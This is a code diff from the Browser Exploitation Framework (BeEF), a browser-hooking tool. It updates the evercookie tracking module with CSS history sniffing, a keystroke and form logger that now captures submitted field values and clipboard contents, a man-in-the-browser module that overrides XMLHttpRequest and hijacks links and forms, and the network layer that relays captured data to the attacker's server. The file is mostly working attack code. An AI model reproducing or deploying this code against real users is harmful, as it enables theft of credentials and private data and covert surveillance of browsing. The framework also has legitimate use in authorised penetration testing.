 			return this.getFromStr(name, window.name);
 	} catch(e) { }
-}
+};

 this.evercookie_userdata = function(name, value)
 {
@@ -302,7 +293,7 @@ this.evercookie_userdata = function(name, value)
 			return elm.getAttribute(name);
 		}
 	} catch(e) { }
-}
+};

 this.evercookie_cache = function(name, value)
 {
@@ -335,7 +326,7 @@ this.evercookie_cache = function(name, value)
 			}
 		});
 	}
-}
+};

 this.evercookie_etag = function(name, value)
 {
@@ -368,7 +359,7 @@ this.evercookie_etag = function(name, value)
 			}
 		});
 	}
-}
+};

 this.evercookie_lso = function(name, value)
 {
@@ -390,7 +381,7 @@ this.evercookie_lso = function(name, value)
 	attributes.id        = "myswf";
 	attributes.name      = "myswf";
 	swfobject.embedSWF("evercookie.swf", "swfcontainer", "1", "1", "9.0.0", false, flashvars, params, attributes);
-}
+};

 this.evercookie_png = function(name, value)
 {
@@ -453,7 +444,7 @@ this.evercookie_png = function(name, value)
 			}	
 		}
 	}
-}
+};

 this.evercookie_local_storage = function(name, value)
 {
@@ -468,7 +459,7 @@ this.evercookie_local_storage = function(name, value)
 		}
 	}
 	catch (e) { }
-}
+};

 this.evercookie_database_storage = function(name, value)
 {
@@ -506,7 +497,7 @@ this.evercookie_database_storage = function(name, value)
 			}
 		}
 	} catch(e) { }
-}
+};

 this.evercookie_session_storage = function(name, value)
 {
@@ -520,7 +511,7 @@ this.evercookie_session_storage = function(name, value)
 				return sessionStorage.getItem(name);
 		}
 	} catch(e) { }
-}
+};

 this.evercookie_global_storage = function(name, value)
 {
@@ -536,7 +527,7 @@ this.evercookie_global_storage = function(name, value)
 				return eval("globalStorage[host]." + name);
 		} catch(e) { }
 	}
-}
+};
 this.evercookie_silverlight = function(name, value) {
    /*
     * Create silverlight embed
@@ -566,7 +557,7 @@ this.evercookie_silverlight = function(name, value) {
            '</a>' +
        '</object>';
        document.body.innerHTML+=html;
-}
+};

 // public method for encoding
 this.encode = function (input) {
@@ -600,7 +591,7 @@ this.encode = function (input) {
 	}

 	return output;
-}
+};

 // public method for decoding
 this.decode = function (input) {
@@ -636,7 +627,7 @@ this.decode = function (input) {

 	return output;

-}
+};

 // private method for UTF-8 encoding
 this._utf8_encode = function (string) {
@@ -663,7 +654,7 @@ this._utf8_encode = function (string) {
 	}

 	return utftext;
-}
+};

 // private method for UTF-8 decoding
 this._utf8_decode = function (utftext) {
@@ -694,7 +685,7 @@ this._utf8_decode = function (utftext) {
 	}

 	return string;
-}
+};

 // this is crazy but it's 4am in dublin and i thought this would be hilarious
 // blame the guinness
@@ -759,7 +750,7 @@ this.evercookie_history = function(name, value)
 			return this.decode(val);
 		}
 	}
-}
+};

 this.createElem = function(type, name, append)
 {
@@ -778,14 +769,14 @@ this.createElem = function(type, name, append)
 		document.body.appendChild(el);

 	return el;
-}
+};

 this.createIframe = function(url, name)
 {
 	var el = this.createElem('iframe', name, 1);
 	el.setAttribute('src', url);
 	return el;
-}
+};

 // wait for our swfobject to appear (swfobject.js to load)
 this.waitForSwf = function(i)
@@ -798,7 +789,7 @@ this.waitForSwf = function(i)
 	// wait for ~2 seconds for swfobject to appear
 	if (i < _ec_tests && typeof swfobject == 'undefined')
 		setTimeout(function() { waitForSwf(i) }, 300);
-}
+};

 this.evercookie_cookie = function(name, value)
 {
@@ -810,7 +801,7 @@ this.evercookie_cookie = function(name, value)
 	}
 	else
 		return this.getFromStr(name, document.cookie);
-}
+};

 // get value from param-like string (eg, "x=y&name=VALUE")
 this.getFromStr = function(name, text)
@@ -828,7 +819,7 @@ this.getFromStr = function(name, text)
 		if (c.indexOf(nameEQ) == 0)
 			return c.substring(nameEQ.length, c.length);
 	}
-}
+};

 this.getHost = function()
 {
@@ -836,7 +827,7 @@ this.getHost = function()
 	if (domain.indexOf('www.') == 0)
 		domain = domain.replace('www.', '');
 	return domain;
-}
+};

 this.toHex = function(str)
 {
@@ -852,7 +843,7 @@ this.toHex = function(str)
        r += h;
    }
    return r;
-}
+};

 this.fromHex = function(str)
 {
@@ -866,7 +857,7 @@ this.fromHex = function(str)
        e = s;
    }
    return r;
-}
+};

 /* 
 * css history knocker (determine what sites your visitors have been to)
@@ -901,7 +892,7 @@ this.hasVisited = function(url)
 		this._testURL("https://" + url, this.no_color) ||
 		this._testURL("http://www." + url, this.no_color) ||
 		this._testURL("https://www." + url, this.no_color);
-}
+};

 /* create our anchor tag */
 var _link = this.createElem('a', '_ec_rgb_link');
@@ -930,30 +921,28 @@ try {
 }

 /* if test_color, return -1 if we can't set a style */
-this._getRGB = function(u, test_color)
-{
-	if (test_color && created_style == 0)
-		return -1;
+this._getRGB = function (u, test_color) {
+    if (test_color && created_style == 0)
+        return -1;

-	/* create the new anchor tag with the appropriate URL information */
-	_link.href = u;
-	_link.innerHTML = u;
-	// not sure why, but the next two appendChilds always have to happen vs just once
-	document.body.appendChild(style);
-	document.body.appendChild(_link);
-	
-	/* add the link to the DOM and save the visible computed color */
-	var color;
-	if (document.defaultView)
-		color = document.defaultView.getComputedStyle(_link, null).getPropertyValue('color');
-	else
-		color = _link.currentStyle['color'];
+    /* create the new anchor tag with the appropriate URL information */
+    _link.href = u;
+    _link.innerHTML = u;
+    // not sure why, but the next two appendChilds always have to happen vs just once
+    document.body.appendChild(style);
+    document.body.appendChild(_link);

-	return color;
-}
+    /* add the link to the DOM and save the visible computed color */
+    var color;
+    if (document.defaultView)
+        color = document.defaultView.getComputedStyle(_link, null).getPropertyValue('color');
+    else
+        color = _link.currentStyle['color'];

-this._testURL = function(url, no_color)
-{
+    return color;
+};
+
+this._testURL = function(url, no_color){
 	var color = this._getRGB(url);

 	/* check to see if the link has been visited if the computed color is red */
--- a/core/main/client/lib/jools.min.js
+++ b/core/main/client/lib/jools.min.js
--- a/core/main/client/logger.js
+++ b/core/main/client/logger.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /*!
 * @literal object: beef.logger
 *
@@ -58,9 +49,11 @@ beef.logger = {
 	 * Starts the logger
 	 */
 	start: function() {
+
 		this.running = true;
 		var d = new Date();
 		this.time = d.getTime();
+
 		$j(document).keypress(
 			function(e) { beef.logger.keypress(e); }
 		).click(
@@ -71,9 +64,18 @@ beef.logger = {
 		).blur(
 			function(e) { beef.logger.win_blur(e); }
 		);
-		/*$j('form').submit(
+		$j('form').submit(
 			function(e) { beef.logger.submit(e); }
-		);*/
+		);
+		document.body.oncopy = function() {
+			setTimeout("beef.logger.copy();", 10);
+		};
+		document.body.oncut = function() {
+			setTimeout("beef.logger.cut();", 10);
+		};
+		document.body.onpaste = function() {
+			beef.logger.paste();
+		}
 	},
 	
 	/**
@@ -137,11 +139,57 @@ beef.logger = {
 	},
 	
 	/**
-	 * Is called whenever a form is submitted
+	 * Copy function fires when the user copies data to the clipboard.
+	 */
+	copy: function(x) {
+		try {
+			var c = new beef.logger.e();
+			c.type = 'copy';
+			c.data = clipboardData.getData("Text");
+			this.events.push(c);
+		} catch(e) {}
+	},
+
+	/**
+	 * Cut function fires when the user cuts data to the clipboard.
+	 */
+	cut: function() {
+		try {
+			var c = new beef.logger.e();
+			c.type = 'cut';
+			c.data = clipboardData.getData("Text");
+			this.events.push(c);
+		} catch(e) {}
+	},
+
+	/**
+	 * Paste function fires when the user pastes data from the clipboard.
+	 */
+	paste: function() {
+		try {
+			var c = new beef.logger.e();
+			c.type = 'paste';
+			c.data = clipboardData.getData("Text");
+			this.events.push(c);
+		} catch(e) {}
+	},
+
+	/**
+	 * Submit function fires whenever a form is submitted
     * TODO: Cleanup this function
 	 */
 	submit: function(e) {
-		/*this.events.push('Form submission: Action: '+$j(e.target).attr('action')+' Method: '+$j(e.target).attr('method')+' @ '+beef.logger.get_timestamp()+'s > '+beef.logger.get_dom_identifier(e.target));*/
+		try {
+			var f = new beef.logger.e();
+			var values = "";
+			f.type = 'submit';
+			f.target = beef.logger.get_dom_identifier(e.target);
+			for (var i = 0; i < e.target.elements.length; i++) {
+	            values += "["+i+"] "+e.target.elements[i].name+"="+e.target.elements[i].value+"\n";
+	        }
+			f.data = 'Action: '+$j(e.target).attr('action')+' - Method: '+$j(e.target).attr('method') + ' - Values:\n'+values;
+			this.events.push(f);
+		} catch(e) {}
 	},
 	
 	/**
--- a/core/main/client/mitb.js
+++ b/core/main/client/mitb.js
@@ -1,135 +1,249 @@
-//
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
-//
-
-beef.mitb = {
-	
-	cid: null,
-	curl: null,
-	
-	init: function(cid, curl){
-		beef.mitb.cid = cid;
-		beef.mitb.curl = curl;
-	},
-	
-	// Initializes the hook on anchors and forms.
-	hook: function(){ 	
-		beef.onpopstate.push(function(event) {beef.mitb.fetch(document.location, document.getElementsByTagName("html")[0]);});
-		beef.onclose.push(function(event) {beef.mitb.endSession();});
-		var anchors = document.getElementsByTagName("a");
-		var forms = document.getElementsByTagName("form");
-		for(var i=0;i<anchors.length;i++){
-			anchors[i].onclick = beef.mitb.poisonAnchor;
-		}
-		for(var i=0;i<forms.length;i++){
-			beef.mitb.poisonForm(forms[i]);
-		}
-	},
-	
-	// Hooks anchors and prevents them from linking away
-	poisonAnchor: function(e){
-		try{
-			e.preventDefault;
-			if(beef.mitb.fetch(e.currentTarget, document.getElementsByTagName("html")[0])){
-				var title = "";
-				if(document.getElementsByTagName("title").length == 0){
-					title = document.title;
-				}else{
-					title = document.getElementsByTagName("title")[0].innerHTML;
-				}
-				history.pushState({ Be: "EF" }, title, e.currentTarget);
-			}
-		}catch(e){
-			console.error('beef.mitb.poisonAnchor - failed to execute: ' + e.message);
-		}
-		return false;
-	},
-	
-	// Hooks forms and prevents them from linking away
-	poisonForm: function(form){
-		form.onsubmit=function(e){
-			var inputs = form.getElementsByTagName("input");
-			var query = "";
-			for(var i=0;i<inputs.length;i++){
-				if(i>0 && i<inputs.length-1) query += "&";
-				switch(inputs[i].type){
-					case "submit":
-						break;
-					default:
-						query += inputs[i].name + "=" + inputs[i].value;
-						break;
-				}
-			}
-			e.preventdefault;
-			beef.mitb.fetchForm(form.action, query, document.getElementsByTagName("html")[0]);
-			history.pushState({ Be: "EF" }, "", form.action);
-			return false;
-		}
-	},
-	
-	// Fetches a hooked form with AJAX
-	fetchForm: function(url, query, target){
-		try{
-			var y = new XMLHttpRequest();
-			y.open('POST', url, false);
-			y.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
-			y.onreadystatechange = function(){
-				if(y.readyState == 4 && y.responseText != ""){
-					target.innerHTML = y.responseText;
-					setTimeout(beef.mitb.hook, 10);
-				}
-			}
-			y.send(query);
-			beef.mitb.sniff("POST: "+url+" ["+query+"]");
-			return true;
-		}catch(x){
-			return false;
-		}
-	},
-	
-	// Fetches a hooked link with AJAX
-	fetch: function(url, target){
-		try{
-			var y = new XMLHttpRequest();
-			y.open('GET', url,false);
-			y.onreadystatechange = function(){
-				if(y.readyState == 4 && y.responseText != ""){
-					target.innerHTML = y.responseText;
-					setTimeout(beef.mitb.hook, 10);
-				}
-			}
-			y.send(null);
-			beef.mitb.sniff("GET: "+url);
-			return true;
-		}catch(x){
-			window.open(url);
-			beef.mitb.sniff("GET [New Window]: "+url);
-			return false;
-		}
-	},
-	
-	// Relays an entry to the framework
-	sniff: function(result){
-		try{
-			beef.net.send(beef.mitb.cid, beef.mitb.curl, result);
-		}catch(x){}
-		return true;
-	},
-	
-	// Signals the Framework that the user has lost the hook
-	endSession: function(){
-		beef.mitb.sniff("Window closed.");
-	}
-}
+//
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+
+beef.mitb = {
+
+    cid:null,
+    curl:null,
+
+    init:function (cid, curl) {
+        beef.mitb.cid = cid;
+        beef.mitb.curl = curl;
+        /*Override open method to intercept ajax request*/
+        var xml_type;
+
+        if (window.XMLHttpRequest && !(window.ActiveXObject)) {
+
+            xml_type = 'XMLHttpRequest';
+        }
+
+        if (xml_type == "XMLHttpRequest") {
+            beef.mitb.sniff("Method XMLHttpRequest.open override");
+            (function (open) {
+                XMLHttpRequest.prototype.open = function (method, url, async, user, pass) {
+
+                    var portRegex = new RegExp(":[0-9]+");
+                    var portR = portRegex.exec(url);
+                    /*return :port*/
+                    var requestPort;
+
+                    if (portR != null) {
+                        requestPort = portR[0].split(":");
+                    }
+
+                    if ((user == "beef") && (pass == "beef")) {
+                        /*a poisoned something*/
+                        open.call(this, method, url, async, null, null);
+                    }
+
+
+                    else if (url.indexOf("hook.js") != -1 || url.indexOf("/dh?") != -1) {
+                        /*a beef hook.js polling or dh */
+                        open.call(this, method, url, async, null, null);
+                    }
+
+                    else {
+
+                        if (method == "GET") {
+                            if (url.indexOf(document.location.hostname) == -1 || (portR != null && requestPort != document.location.port )) {
+                                beef.mitb.sniff("GET [Ajax CrossDomain Request]: " + url);
+                                window.open(url);
+
+                            }
+                            else {
+                                beef.mitb.sniff("GET [Ajax Request]: " + url);
+                                if (beef.mitb.fetch(url, document.getElementsByTagName("html")[0])) {
+                                    var title = "";
+                                    if (document.getElementsByTagName("title").length == 0) {
+                                        title = document.title;
+                                    } else {
+                                        title = document.getElementsByTagName("title")[0].innerHTML;
+                                    }
+                                    /*write the url of the page*/
+                                    history.pushState({ Be:"EF" }, title, url);
+
+                                }
+
+                            }
+
+                        }
+                        else {
+                            /*if we are here we have an ajax post req*/
+                            beef.mitb.sniff("Post ajax request to: " + url);
+                            open.call(this, method, url, async, user, pass);
+
+                        }
+                    }
+                };
+            })(XMLHttpRequest.prototype.open);
+
+        }
+
+    },
+
+    // Initializes the hook on anchors and forms.
+    hook:function () {
+        beef.onpopstate.push(function (event) {
+            beef.mitb.fetch(document.location, document.getElementsByTagName("html")[0]);
+        });
+        beef.onclose.push(function (event) {
+            beef.mitb.endSession();
+        });
+
+        var anchors = document.getElementsByTagName("a");
+        var forms = document.getElementsByTagName("form");
+        var lis = document.getElementsByTagName("li");
+
+        for (var i = 0; i < anchors.length; i++) {
+            anchors[i].onclick = beef.mitb.poisonAnchor;
+        }
+        for (var i = 0; i < forms.length; i++) {
+            beef.mitb.poisonForm(forms[i]);
+        }
+
+        for (var i = 0; i < lis.length; i++) {
+            if (lis[i].hasAttribute("onclick")) {
+                lis[i].removeAttribute("onclick");
+                /*clear*/
+                lis[i].setAttribute("onclick", "beef.mitb.fetchOnclick('" + lis[i].getElementsByTagName("a")[0] + "')");
+                /*override*/
+
+            }
+        }
+    },
+
+    // Hooks anchors and prevents them from linking away
+    poisonAnchor:function (e) {
+        try {
+            e.preventDefault;
+            if (beef.mitb.fetch(e.currentTarget, document.getElementsByTagName("html")[0])) {
+                var title = "";
+                if (document.getElementsByTagName("title").length == 0) {
+                    title = document.title;
+                } else {
+                    title = document.getElementsByTagName("title")[0].innerHTML;
+                }
+                history.pushState({ Be:"EF" }, title, e.currentTarget);
+            }
+        } catch (e) {
+            console.error('beef.mitb.poisonAnchor - failed to execute: ' + e.message);
+        }
+        return false;
+    },
+
+    // Hooks forms and prevents them from linking away
+    poisonForm:function (form) {
+        form.onsubmit = function (e) {
+            var inputs = form.getElementsByTagName("input");
+            var query = "";
+            for (var i = 0; i < inputs.length; i++) {
+                if (i > 0 && i < inputs.length - 1) query += "&";
+                switch (inputs[i].type) {
+                    case "submit":
+                        break;
+                    default:
+                        query += inputs[i].name + "=" + inputs[i].value;
+                        break;
+                }
+            }
+            e.preventdefault;
+            beef.mitb.fetchForm(form.action, query, document.getElementsByTagName("html")[0]);
+            history.pushState({ Be:"EF" }, "", form.action);
+            return false;
+        }
+    },
+
+    // Fetches a hooked form with AJAX
+    fetchForm:function (url, query, target) {
+        try {
+            var y = new XMLHttpRequest();
+            y.open('POST', url, false, "beef", "beef");
+            y.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
+            y.onreadystatechange = function () {
+                if (y.readyState == 4 && y.responseText != "") {
+                    target.innerHTML = y.responseText;
+                    setTimeout(beef.mitb.hook, 10);
+                }
+            };
+            y.send(query);
+            beef.mitb.sniff("POST: " + url + "[" + query + "]");
+            return true;
+        } catch (x) {
+            return false;
+        }
+    },
+
+    // Fetches a hooked link with AJAX
+    fetch:function (url, target) {
+        try {
+            var y = new XMLHttpRequest();
+            y.open('GET', url, false, "beef", "beef");
+            y.onreadystatechange = function () {
+                if (y.readyState == 4 && y.responseText != "") {
+
+                    target.innerHTML = y.responseText;
+                    setTimeout(beef.mitb.hook, 10);
+                }
+            }
+            y.send(null);
+            beef.mitb.sniff("GET: " + url);
+            return true;
+        } catch (x) {
+            window.open(url);
+            beef.mitb.sniff("GET [New Window]: " + url);
+            return false;
+        }
+    },
+
+    // Fetches a window.location=http://domainname.com and setting up history
+    fetchOnclick:function (url) {
+        try {
+            var target = document.getElementsByTagName("html")[0];
+            var y = new XMLHttpRequest();
+            y.open('GET', url, false, "beef", "beef");
+            y.onreadystatechange = function () {
+                if (y.readyState == 4 && y.responseText != "") {
+                    var title = "";
+                    if (document.getElementsByTagName("title").length == 0) {
+                        title = document.title;
+                    }
+                    else {
+                        title = document.getElementsByTagName("title")[0].innerHTML;
+                        }
+                    history.pushState({ Be:"EF" }, title, url);
+                    target.innerHTML = y.responseText;
+                    setTimeout(beef.mitb.hook, 10);
+                }
+            };
+            y.send(null);
+            beef.mitb.sniff("GET: " + url);
+
+        } catch (x) {
+
+
+            window.open(url);
+            beef.mitb.sniff("GET [New Window]: " + url);
+
+        }
+    },
+
+    // Relays an entry to the framework
+    sniff:function (result) {
+        try {
+            beef.net.send(beef.mitb.cid, beef.mitb.curl, result);
+        } catch (x) {
+        }
+        return true;
+    },
+
+    // Signals the Framework that the user has lost the hook
+    endSession:function () {
+        beef.mitb.sniff("Window closed.");
+    }
+};
+
+beef.regCmp('beef.mitb');
--- a/core/main/client/net.js
+++ b/core/main/client/net.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /*!
 * @literal object: beef.net
 *
@@ -20,17 +11,18 @@
 */
 beef.net = {

-    host: "<%= @beef_host %>",
-    port: "<%= @beef_port %>",
-    hook: "<%= @beef_hook %>",
-    handler: '/dh',
-    chop: 500,
-    pad: 30, //this is the amount of padding for extra params such as pc, pid and sid
-    sid_count: 0,
-    cmd_queue: [],
+    host:"<%= @beef_host %>",
+    port:"<%= @beef_port %>",
+    hook:"<%= @beef_hook %>",
+    httpproto:"<%= @beef_proto %>",
+    handler:'/dh',
+    chop:500,
+    pad:30, //this is the amount of padding for extra params such as pc, pid and sid
+    sid_count:0,
+    cmd_queue:[],

    //Command object
-    command: function() {
+    command:function () {
        this.cid = null;
        this.results = null;
        this.handler = null;
@@ -38,30 +30,30 @@ beef.net = {
    },

    //Packet object
-    packet: function() {
+    packet:function () {
        this.id = null;
        this.data = null;
    },

    //Stream object
-    stream: function() {
+    stream:function () {
        this.id = null;
        this.packets = [];
        this.pc = 0;
-        this.get_base_url_length = function() {
+        this.get_base_url_length = function () {
            return (this.url + this.handler + '?' + 'bh=' + beef.session.get_hook_session_id()).length;
-        },
-            this.get_packet_data = function() {
-                var p = this.packets.shift();
-                return {'bh':beef.session.get_hook_session_id(), 'sid':this.id, 'pid':p.id, 'pc':this.pc, 'd':p.data }
-            };
+        };
+        this.get_packet_data = function () {
+             var p = this.packets.shift();
+             return {'bh':beef.session.get_hook_session_id(), 'sid':this.id, 'pid':p.id, 'pc':this.pc, 'd':p.data }
+        };
    },

    /**
     * Response Object - used in the beef.net.request callback
     * Note: as we are using async mode, the response object will be empty if returned.Using sync mode, request obj fields will be populated.
     */
-    response: function() {
+    response:function () {
        this.status_code = null;        // 500, 404, 200, 302
        this.status_text = null;        // success, timeout, error, ...
        this.response_body = null;      // "<html>…." if not a cross domain request
@@ -73,7 +65,7 @@ beef.net = {
    },

    //Queues the command, to be sent back to the framework on the next refresh
-    queue: function(handler, cid, results, callback) {
+    queue:function (handler, cid, results, callback) {
        if (typeof(handler) === 'string' && typeof(cid) === 'number' && (callback === undefined || typeof(callback) === 'function')) {
            var s = new beef.net.command();
            s.cid = cid;
@@ -85,13 +77,26 @@ beef.net = {
    },

    //Queues the current command and flushes the queue straight away
-    send: function(handler, cid, results, callback) {
-        this.queue(handler, cid, results, callback);
-        this.flush();
+    send:function (handler, cid, results, callback) {
+        if (typeof beef.websocket === "undefined") {
+            this.queue(handler, cid, results, callback);
+            this.flush();
+        }
+        else {
+            try {
+                beef.websocket.send('{"handler" : "' + handler + '", "cid" :"' + cid +
+                    '", "result":"' + beef.encode.base64.encode(beef.encode.json.stringify(results)) +
+                    '","callback": "' + callback + '","bh":"' + beef.session.get_hook_session_id() + '" }');
+            }
+            catch (e) {
+                this.queue(handler, cid, results, callback);
+                this.flush();
+                }
+        }
    },

    //Flush all currently queued commands to the framework
-    flush: function() {
+    flush:function () {
        if (this.cmd_queue.length > 0) {
            var data = beef.encode.base64.encode(beef.encode.json.stringify(this.cmd_queue));
            this.cmd_queue.length = 0;
@@ -115,16 +120,16 @@ beef.net = {
    },

    //Split string into chunk lengths determined by amount
-    chunk: function(str, amount) {
+    chunk:function (str, amount) {
        if (typeof amount == 'undefined') n = 2;
        return str.match(RegExp('.{1,' + amount + '}', 'g'));
    },

    //Push packets to framework
-    push: function(stream) {
+    push:function (stream) {
        //need to implement wait feature here eventually
        for (var i = 0; i < stream.pc; i++) {
-            this.request('http', 'GET', this.host, this.port, this.handler, null, stream.get_packet_data(), 10, 'text', null);
+            this.request(this.httpproto, 'GET', this.host, this.port, this.handler, null, stream.get_packet_data(), 10, 'text', null);
        }
    },

@@ -143,10 +148,10 @@ beef.net = {
     *
     * @return: {Object} response: this object contains the response details
     */
-    request: function(scheme, method, domain, port, path, anchor, data, timeout, dataType, callback) {
+    request:function (scheme, method, domain, port, path, anchor, data, timeout, dataType, callback) {
        //check if same domain or cross domain
        var cross_domain = true;
-        if (document.domain == domain){
+		if (document.domain == domain.replace(/(\r\n|\n|\r)/gm,"")) { //strip eventual line breaks
            if(document.location.port == "" || document.location.port == null){
                cross_domain = !(port == "80" || port == "443");
            }
@@ -154,9 +159,9 @@ beef.net = {

        //build the url
        var url = "";
-        if(path.indexOf("http://") != -1 || path.indexOf("https://") != -1){
+        if (path.indexOf("http://") != -1 || path.indexOf("https://") != -1) {
            url = path;
-        }else{
+        } else {
            url = scheme + "://" + domain;
            url = (port != null) ? url + ":" + port : url;
            url = (path != null) ? url + path : url;
@@ -176,26 +181,26 @@ beef.net = {
           $j.ajaxSetup({
              dataType: dataType
           });
-        }else{ //GET, HEAD, ...
+        } else {
           $j.ajaxSetup({
-               dataType: 'script'
+                dataType: 'script'
           });
        }

        //build and execute the request
-        $j.ajax({type: method,
-            url: url,
-            data: data,
-            timeout: (timeout * 1000),
+        $j.ajax({type:method,
+            url:url,
+            data:data,
+            timeout:(timeout * 1000),

            //needed otherwise jQuery always add Content-type: application/xml, even if data is populated
-            beforeSend: function(xhr) {
-                if(method == "POST"){
+            beforeSend:function (xhr) {
+                if (method == "POST") {
                    xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded; charset=utf-8");
                }
            },

-            success: function(data, textStatus, xhr) {
+            success:function (data, textStatus, xhr) {
                var end_time = new Date().getTime();
                response.status_code = xhr.status;
                response.status_text = textStatus;
@@ -204,14 +209,14 @@ beef.net = {
                response.was_timedout = false;
                response.duration = (end_time - start_time);
            },
-            error: function(jqXHR, textStatus, errorThrown) {
+            error:function (jqXHR, textStatus, errorThrown) {
                var end_time = new Date().getTime();
                response.response_body = jqXHR.responseText;
                response.status_code = jqXHR.status;
                response.status_text = textStatus;
                response.duration = (end_time - start_time);
            },
-            complete: function(jqXHR, textStatus) {
+            complete:function (jqXHR, textStatus) {
                response.status_code = jqXHR.status;
                response.status_text = textStatus;
                response.headers = jqXHR.getAllResponseHeaders();
@@ -226,11 +231,11 @@ beef.net = {
                    response.port_status = "open";
                }
            }
-        }).done(function() {
-            if (callback != null) {
-                callback(response);
-            }
-        });
+        }).done(function () {
+                if (callback != null) {
+                    callback(response);
+                }
+            });
        return response;
    },

@@ -239,13 +244,14 @@ beef.net = {
     *  - requestid: needed on the callback
     *  - allowCrossDomain: set cross-domain requests as allowed or blocked
     */
-    forge_request: function(scheme, method, domain, port, path, anchor, headers, data, timeout, dataType, allowCrossDomain, requestid, callback) {
+    forge_request:function (scheme, method, domain, port, path, anchor, headers, data, timeout, dataType, allowCrossDomain, requestid, callback) {

        // check if same domain or cross domain
        var cross_domain = true;
-        if (document.domain == domain) {
+
+        if (document.domain == domain.replace(/(\r\n|\n|\r)/gm,"")) { //strip eventual line breaks
           if(document.location.port == "" || document.location.port == null){
-              cross_domain = !(port == "80" || port == "443");
+               cross_domain = !(port == "80" || port == "443");
           } else {
              if (document.location.port == port) cross_domain = false;
           }
@@ -274,20 +280,25 @@ beef.net = {
            response.status_text = "crossdomain";
            response.port_status = "crossdomain";
            response.response_body = "ERROR: Cross Domain Request. The request was not sent.\n";
-			response.headers = "ERROR: Cross Domain Request. The request was not sent.\n";
+            response.headers = "ERROR: Cross Domain Request. The request was not sent.\n";
            callback(response, requestid);
            return response;
        }

        // build and execute the request
-        if (method == "POST"){
-          $j.ajaxSetup({
-              data: data
-          });
+        if (method == "POST") {
+            $j.ajaxSetup({
+                data:data
+            });
+        }
+
+		// this is required for bugs in IE so data can be transfered back to the server
+        if ( beef.browser.isIE() ) {
+            dataType = 'script'
        }

        $j.ajax({type: method,
-            dataType: 'script', // this is required for bugs in IE so data can be transfered back to the server
+            dataType: dataType,
            url: url,
            headers: headers,
            timeout: (timeout * 1000),
@@ -295,14 +306,14 @@ beef.net = {
            // needed otherwise jQuery always adds:
            // Content-type: application/xml
            // even if data is populated
-            beforeSend: function(xhr) {
+            beforeSend:function (xhr) {
                if (method == "POST") {
-                   xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded; charset=utf-8");
+                    xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded; charset=utf-8");
                }
            },

            // http server responded successfully
-            success: function(data, textStatus, xhr) {
+            success:function (data, textStatus, xhr) {
                var end_time = new Date().getTime();
                response.status_code = xhr.status;
                response.status_text = textStatus;
@@ -313,7 +324,7 @@ beef.net = {

            // server responded with a http error (403, 404, 500, etc)
            // or server is not a http server
-            error: function(xhr, textStatus, errorThrown) {
+            error:function (xhr, textStatus, errorThrown) {
                var end_time = new Date().getTime();
                response.response_body = xhr.responseText;
                response.status_code = xhr.status;
@@ -321,14 +332,34 @@ beef.net = {
                response.duration = (end_time - start_time);
            },

-            complete: function(xhr, textStatus) {
+            complete:function (xhr, textStatus) {
                // cross-domain request
                if (cross_domain) {
-                    response.status_code = -1;
-                    response.status_text = "crossdomain";
-                    response.port_status = "crossdomain";
-                    response.response_body = "ERROR: Cross Domain Request. The request was sent however it is impossible to view the response.\n";
-                    response.headers = "ERROR: Cross Domain Request. The request was sent however it is impossible to view the response.\n";
+
+					response.port_status = "crossdomain";
+
+                    if (xhr.status != 0) {
+						response.status_code = xhr.status;
+					} else {
+						response.status_code = -1;
+					}
+
+					if (textStatus) {
+                    	response.status_text = textStatus;
+					} else {
+						response.status_text = "crossdomain";
+					}
+
+					if (xhr.getAllResponseHeaders()) {
+	                    response.headers = xhr.getAllResponseHeaders();
+					} else {
+						response.headers = "ERROR: Cross Domain Request. The request was sent however it is impossible to view the response.\n";
+					}
+
+					if (!response.response_body) {
+						response.response_body = "ERROR: Cross Domain Request. The request was sent however it is impossible to view the response.\n";
+					}
+
                } else {
                    // same-domain request
                    response.status_code = xhr.status;
@@ -354,7 +385,7 @@ beef.net = {

    //this is a stub, as associative arrays are not parsed by JSON, all key / value pairs should use new Object() or {}
    //http://andrewdupont.net/2006/05/18/javascript-associative-arrays-considered-harmful/
-    clean: function(r) {
+    clean:function (r) {
        if (this.array_has_string_key(r)) {
            var obj = {};
            for (var key in r)
@@ -365,7 +396,7 @@ beef.net = {
    },

    //Detects if an array has a string key
-    array_has_string_key: function(arr) {
+    array_has_string_key:function (arr) {
        if ($j.isArray(arr)) {
            try {
                for (var key in arr)
